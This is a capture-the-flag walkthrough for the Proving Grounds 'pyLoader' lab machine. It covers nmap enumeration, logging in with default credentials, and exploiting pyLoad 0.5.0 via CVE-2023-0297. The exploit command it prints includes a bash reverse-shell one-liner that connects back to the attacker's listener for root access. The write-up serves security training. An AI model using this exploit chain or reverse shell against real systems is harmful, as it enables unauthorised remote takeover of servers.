In this walk through, we will be going through the pyLoader room from Proving Grounds. This room is rated as Intermediate on the platform and it consists of exploitation of pyLoad via CVE-2023-0297 to get root on the target. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | pyLoader |
IPaddress | 192.168.169.29 |
Difficulty | Intermediate |
OS | Linux |
Description | pyLoader is an Intermediate Linux machine which is vulnerable to CVE-2023-0297 and requires its exploitation to get root. |
Enumeration:
- I started off with a regular aggressive nmap scan and found only two ports opened – 22 (SSH) and 9666 (HTTP).
$ sudo nmap -A 192.168.236.26 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-07 20:54 IST Nmap scan report for 192.168.236.26 Host is up (0.20s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) 53/tcp filtered domain 9666/tcp open http CherryPy wsgiserver | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Cheroot/8.6.0 | http-title: Login - pyLoad |_Requested resource was /login?next=http://192.168.236.26:9666/ No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=2/7%OT=22%CT=1%CU=35039%PV=Y%DS=4%DC=T%G=Y%TM=65C3A0F9 OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=2%ISR=10A%TI=Z%II=I%TS=A)SEQ(SP=10 OS:2%GCD=1%ISR=10A%TI=Z%TS=A)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11 OS:NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE8 OS:8%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=) OS:T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y% OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T5(R=N)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40% OS:IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=8522%RUD=G)IE(R=Y%DFI=N%T=40%CD=S OS:) Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 21/tcp) HOP RTT ADDRESS 1 201.36 ms 192.168.45.1 2 201.36 ms 192.168.45.254 3 202.21 ms 192.168.251.1 4 202.27 ms 192.168.236.26 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 88.58 seconds
- Enumerated the web server running on port 9666. Found out that the pyLoad application was running on it and has a login panel in the home page.
- Used the default username and password combo to log into the PyLoad backend successfully. Enumerated the pyLoad running version – 0.5.0
pyload: pyload
Exploitation & Getting root:
- Looked for any known exploits for concerned application version and found out that it is vulnerable to CVE-2023-0297 which is a Pre-Auth RCE vulnerability.
searchsploit pyload
- Used the below exploit on the target specifying the target host and port number along with the command to executed which was the bash reverse shell one liner along with our listening IP and port. Once the execution is completed, we will receive a connection back at our netcat listener as root.
Exploit – https://github.com/JacobEbben/CVE-2023-0297
python3 exploit.py -t 192.168.236.26:9666 -c 'bash -i >& /dev/tcp/192.168.45.215/4444 0>&1' -I 192.168.45.215 -P 4444
- Captured the root flag and marked the machine as complete.
Also Read: PG – Plum
Conclusion:
So that was “pyLoader” for you. We started off with a regular nmap scan and found two ports opened – 22 (SSH) and 9666 (HTTP). Enumerated the web server running on port 9666 and found pyLoad running. Used the default username and password combo to log into the PyLoad backend successfully. In there, found out that it is running the version 0.5.0. Looked for any known exploit and found it is vulnerable to CVE-2023-0297. At last, used the same to get root on the target. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.